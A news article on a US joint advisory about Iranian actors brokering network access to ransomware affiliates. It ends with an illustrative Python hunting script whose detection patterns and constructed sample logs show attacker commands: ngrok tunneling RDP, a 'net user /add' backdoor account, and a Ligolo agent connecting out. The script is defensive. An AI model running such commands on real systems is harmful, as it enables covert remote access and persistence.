After they’re done spying for the government, the Iranian cyber army will trade access to victim organizations for money. The Federal Bureau of Investigation (FBI) warns that the state-sponsored group has a wide arsenal of tools to breach education, finance, healthcare, and defense organizations.
The group of Iran-based cyber actors goes by many names: Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, or Lemon Sandstorm. They call themselves Br0k3r or “xplfinder” in their own channels.
Serving the Government of Iran to conduct computer network exploitation, espionage, and theft of sensitive data from Israel or Azerbaijan is not enough for them.
They also sell or broker unauthorized access to companies’ systems in the US and elsewhere around the globe.
According to a new joint advisory by US cyber authorities, the FBI has identified Iranian actors collaborating directly with ransomware affiliates to enable encryption operations in exchange for a percentage of the ransom payments.
“These actors have collaborated with the ransomware affiliates NoEscape, Ransomhouse, and ALPHV (aka BlackCat),” the advisory claims.
The Iranian cyber actors’ involvement goes beyond providing access. They also work closely with ransomware affiliates to help lock computer networks and strategize how to better extort their victims.
“These actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin,” the FBI assesses.
The updated tactics build on Pay2Key, a successful information operation against Israeli companies in 2020. That hack-and-leak campaign aimed not to obtain ransom payments but to undermine confidence in the security of Israel-based cyber infrastructure.
Iranian actors operated a leak site on the dark web, which was hosted on a compromised organization’s infrastructure. The hackers announced their achievements on social media, tagging accounts of the victims and media organizations and leaking stolen victim data.
The FBI warns that, as of August 2024, Iran’s attackers are actively exploiting US and foreign organizations. Those include US-based schools, municipal governments, financial institutions, and healthcare facilities.
“This group directs their activity towards countries and organizations consistent with Iranian state interests, and typically not of interest to the group’s ransomware affiliate contacts, such as US defense sector networks, and those in Israel, Azerbaijan, United Arab Emirates,” the FBI said.
“The group’s ransomware activities are likely not sanctioned by the GOI, as the actors have expressed concern for government monitoring of cryptocurrency movement associated with their malicious activity.”
A wide arsenal of cyber tools
Iran’s threat actors often start their intrusions by exploiting remote external services on internet-facing systems, as the US agencies describe in an overview of the observed tactics.
Lately, they’ve been scanning IP addresses hosting Check Point Security Gateways, probing for a specific vulnerability (CVE-2024-24919). Previously, they mass-scanned IP addresses hosting other vulnerable devices, such as Palo Alto Networks PAN-OS and GlobalProtect VPN.
The group also uses open-source tools, such as the Shodan search engine, to identify and enumerate IP addresses hosting devices that are exposed to particular vulnerabilities.
Once attackers are in, they usually capture login credentials using web shells, create accounts on the victim networks, request exemptions from security policies to maintain persistence, deploy backdoors, and run various malicious payloads.
They were observed using a compromised administrator account to initiate a remote desktop session to another server on the network.
For command and control, Iranian threat actors used the AnyDesk remote access program, the PowerShell Web Access feature, the open-source tunneling tool Ligolo, and the NGROK tool for outbound connections.
The FBI and CISA discovered dozens of IP addresses and bitcoin wallets used by the threat actors. The authorities recommend all organizations implement the mitigations listed in the advisory.
These include reviewing any activity from the listed suspicious IP addresses, applying patches for the specific vulnerabilities the group exploits, monitoring requests to suspicious domains, and checking systems for the unique identifiers used by Tehran’s cyber warriors: specific usernames, NGROK and Ligolo packages, and webshells in particular directories, among others.
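As an added example (not code from the advisory or from this article), the following Python script shows one way a defender could hunt process-creation telemetry for the tools named above: ngrok, Ligolo, AnyDesk, PowerShell Web Access, and local account creation. The regular expressions, the tab-separated record layout, and the sample log lines are all assumptions constructed for illustration, not indicators taken from the advisory.

```python
import re
from typing import Iterable

# Illustrative patterns for the tools the advisory names. They are assumptions
# for this example, not advisory indicators; tune them to your EDR's command-line field.
RULES = {
    "ngrok_tunnel": re.compile(r"\bngrok(?:\.exe)?\b.*\b(?:tcp|http|tunnel|start)\b", re.I),
    "ligolo_agent": re.compile(r"\bligolo\b|\bagent(?:\.exe)?\b.*\s-connect\s", re.I),
    "anydesk_install": re.compile(r"\banydesk(?:\.exe)?\b.*--(?:install|silent)", re.I),
    "pswa_enabled": re.compile(
        r"Install-PswaWebApplication|Add-PswaAuthorizationRule|WindowsPowerShellWebAccess", re.I),
    "local_account_added": re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b|New-LocalUser", re.I),
}

def parse_line(line: str) -> dict:
    """Split one tab-separated record: timestamp, host, user, command line."""
    ts, host, user, cmdline = line.rstrip("\n").split("\t", 3)
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}

def hunt(lines: Iterable[str]) -> list[dict]:
    """Return one finding per (record, rule) match, in input order; blank lines are skipped."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        for name, pattern in RULES.items():
            if pattern.search(rec["cmdline"]):
                findings.append({"rule": name, **rec})
    return findings

# Constructed sample records (not real telemetry): timestamp, host, user, command line.
SAMPLE_LOGS = [
    "2024-08-20T03:12:09Z\tSRV-WEB01\tIIS APPPOOL\\DefaultAppPool\tcmd.exe /c C:\\Windows\\Temp\\ngrok.exe tcp 3389",
    "2024-08-20T03:14:51Z\tSRV-WEB01\tNT AUTHORITY\\SYSTEM\tnet user svc_backup P@ss-placeholder /add",
    "2024-08-20T03:20:30Z\tSRV-DC02\tCORP\\adm-placeholder\tpowershell.exe -c Install-PswaWebApplication -UseTestCertificate",
    "2024-08-20T03:22:10Z\tWS-1042\tCORP\\jdoe\tC:\\Users\\jdoe\\Downloads\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent",
    "2024-08-20T03:25:02Z\tSRV-FILE03\tCORP\\jdoe\tC:\\Users\\jdoe\\Downloads\\agent.exe -connect 203.0.113.10:11601 -ignore-cert",
    "2024-08-20T08:00:00Z\tWS-1042\tCORP\\jdoe\tC:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"{f['ts']} {f['host']} [{f['rule']}] {f['cmdline']}")
```

The last sample record is benign and produces no finding; in practice, feed the function exported process-creation events and review each hit against the advisory’s own indicator list.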
Authorities “do not encourage paying ransom,” as that doesn’t guarantee the recovery of encrypted files and only emboldens adversaries to expand their illicit activities.